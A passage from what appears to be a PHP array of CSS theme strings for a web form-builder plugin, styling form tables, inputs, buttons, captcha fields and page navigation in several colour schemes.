!important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#0090E3 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#0090E3 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#0090E3 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#0090E3 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #0090E3 !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating div span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:2px solid #000000;\r\nborder-radius:4px;\r\n}\r\n\r\n.wdform_grading label, .wdform_grading .grading_div\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#000000 !important;\r\nborder:2px solid #000000;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle{\r\nbackground:#000000;\r\nborder:2px solid #000000;\r\n}\r\n\r\n.ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:2px solid #000000;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#000000;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#F2281A;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:2px solid #000000;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:2px solid #000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder-radius: 4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:2px solid #000000;\r\nmargin:5px 7px;\r\nborder-radius: 4px;\r\npadding:1px;\r\n}",
      "39" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:left;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\nborder:8px solid #FFF000 !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #000000 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #FFF000 !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\ncolor:#000000 !important;\nopacity:0.99 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#000000 !important;\n}\n.wdform_date_fields select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.am_pm_select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#000000 !important;\n}\n.wdform_address input\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#000000 !important;\nborder:2px solid #000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.wdform_colon\n{\ncolor:#000000 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.wdform_line\n{\ncolor:#000000 !important;\n}\n.time_box\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:2px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:2px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:2px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.file_upload\n{\nborder:2px solid #000000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000000 !important;\n}    \n.page_deactive\n{\ncolor:#FFF000 !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nborder:4px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FFF000 !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#FFF000 !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #FFF000 !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #FFF000 !important;\nbackground-color:#000000 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#000000 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:red !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #000000 !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#702400;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#702400;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#702400;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #702400;\r\nborder-radius:4px;\r\npadding:0 4px;\r\n}\r\n\r\n\r\n.wdform_grading label\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#702400 !important;\r\nborder:1px solid #702400;\r\n}\r\n\r\n.ui-slider-handle\r\n{\r\nbackground:#702400;\r\nborder:1px solid #702400;\r\n}\r\n\r\n.ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #702400;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#702400;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#702400;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFD39C;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#702400;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #702400;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #702400;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#702400;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\n\r\nborder-radius: 4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#702400;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #702400;\r\nmargin:5px 7px;\r\nborder-radius:4px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#702400;\r\n}",
      "40" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:left;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#770038 !important;\nborder:8px solid #F085AF !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #770038 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #F085AF !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #770038 !important;\ncolor:#770038 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#770038 !important;\n}\n.wdform_date_fields select\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #770038 !important;\n}\n.am_pm_select\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #770038 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#770038 !important;\n}\n.wdform_address input\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#770038 !important;\nborder:1px solid #770038 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #770038 !important;\n}\n.wdform_colon\n{\ncolor:#770038 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#770038 !important;\n}\n.wdform_line\n{\ncolor:#770038 !important;\n}\n.time_box\n{\ncolor:#770038 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #770038 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#770038 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#770038 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#770038 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #770038 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#770038 !important;\nfont-style:normal !important;\nborder:1px solid #770038 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#770038 !important;\n}\n.file_upload\n{\nborder:1px solid #770038 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#770038 !important;\n}    \n.page_deactive\n{\ncolor:#F085AF !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#770038 !important;\n}\n.page_active\n{\ncolor:#770038 !important;\nborder:4px solid #770038 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#F085AF !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#F085AF !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #F085AF !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #F085AF !important;\nbackground-color:#770038 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-family: arial !important;\nborder-radius:15px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 10px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-family: arial !important;\nborder-radius:15px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 10px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #770038 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#770038 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#770038 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-family: arial !important;\nborder-radius:15px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 10px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-family: arial !important;\nborder-radius:15px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 10px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #770038 !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#535E74;\r\n}\r\n\r\n.wdform_scale_rating div span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#535E74;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#535E74;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #535E74 ;\r\nborder-radius:4px;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading label\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#535E74 !important;\r\nborder:1px solid #535E74 ;\r\n}\r\n\r\n.ui-slider-handle{\r\nbackground:#535E74;\r\nborder:1px solid #535E74 ;\r\n}\r\n\r\n.ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #535E74 ;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#535E74 ;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#535E74 ;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#DBE4E3;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#535E74;\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #535E74 ;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #535E74 ;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#535D76;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder-radius: 4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child 